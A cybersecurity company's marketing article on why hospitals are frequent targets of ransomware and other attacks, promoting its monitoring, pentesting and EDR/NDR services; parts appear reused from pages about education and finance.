Why is the focus of attacks on healthcare facilities?
The unprotected situation of the healthcare sector is one of the biggest problems facing the sector in times of pandemic.
Cyber-attacks on hospitals seek easy financial rewards due to the pressure on these institutions to have their systems down, which precipitates ransom payments in many ransomware cases. There are also other motivations, such as identity theft of medical equipment, the possible sale of sensitive information on the darkweb or even direct access to direct patient information.
In 2020, Latin America saw a 112% increase in attacks on the sector, and in Europe, Spain ranks second on the list, being the third most infected country worldwide, just after Canada (250%) and Germany (220%).
24/7 interconnected equipment and devices
Firstly, these are centers that have a constant activity (24x7x365) with management and diagnostic equipment always connected, being systems with a higher degree of computerized components. Healthcare centers have a very complex infrastructure to manage the wide variety of devices and equipment. In addition, they tend to be very long-lived equipment whose security systems become obsolete with the passage of time.
Lack of computer security training
Maybe one of the attacks that has surprised the educational community the most has been the one suffered by several leading universities around the world on their supercomputers, such as the supercomputers of the universities of Edinburgh, Munich or Dresden. The purpose of this attack is to put these computers to work in the “mining” of cryptocurrencies, a type of threat that according to data from the European Cybersecurity Agency (ENISA) is one of the 15 main threats occurring on the European continent, and which shows that even the most advanced computers are susceptible to attack.
Outdated software and obsolete equipment
Often, the existence of different types of software for the common management of information or even for the management of diagnostic information, does not have the relevant security updates or uses operating systems without any type of maintenance.
According to data from a 2019 Forescout report, 70% of computers in the healthcare sector use operating systems with no maintenance support, such as Windows 7, which Microsoft stopped supporting in January 2020.
More attack surface every day
The exponential growth of medical devices that require Internet connection means that there is a large attack surface in each hospital center.
Already in 2019, according to data from an IRDETO survey of more than 700 security managers of hospital centers in the United States, indicated that 82% of these centers had already suffered attacks focused on this type of facility.
Artificial intelligence against 0-day attacks
Thanks to the implementation of cybersecurity platforms with Artificial Intelligence such as Darktrace, it is possible to obtain visibility of all possible threats in the corporate network, responding to them autonomously in just a few seconds and preventing information from being compromised.
Securing Microsoft environments and cloud solutions
We are specialists in analyzing the company’s M365 implementation and we adapt the platform by integrating cybersecurity tools and applying specific configurations so that the information is protected at all times.
SOFISTIC performs a multilevel analysis of the situation of cloud services, analyzing possible configuration defects or open doors to prevent future attacks.
ATLANTIS SOC Security Operations Center
The combination of Sofistic’s 24/7 monitoring service – Atlantis SOC – with other security protocols and tools allows for centralized management of all threats, providing a fast and effective response. In addition, being managed on two continents allows for better efficiency and greater contact with the CSIRTs / CERTs in each country.
Training / consulting and vulnerability analysis (pentesting) services
Thanks to our pentesting service, a thorough analysis of the client’s security breaches (as well as configuration defects and backdoors) is performed, obtaining instructions for resolving the incidents.
On the other hand, a very important part of our work involves training security teams on cybersecurity and the additional protocols/measures to be carried out.
EDR, NDR and XDR: Behavioral analysis and autonomous response
As we know, it’s very important to secure the devices of the users of the infrastructure, in order to avoid possible attack routes to the core of the educational institutions. Through EDR (Endpoint Detection and Response) solutions such as Crowdstrike and NDR (Network Detection and Response) such as Darktrace we obtain visibility across all devices and the network, managing to detect cyber-attacks at the earliest stages thanks to the support of Artificial Intelligence and Machine Learning. Thus, by combining these tools, we achieve the so-called XRD, guaranteeing a higher level of protection by covering both the devices and the network.
Additionally, we can make use of solutions such as Microsoft’s Exabeam or Sentinel to collect and correlate a greater number of events occurring at multiple layers of security. In this way, we get more thorough investigations to detect and respond to much more sophisticated cyber-attacks.
Sofistic has 35 clients related to the financial sector at an international level, mainly in Latin America, with whom it has implemented various solutions for a broad protection of companies.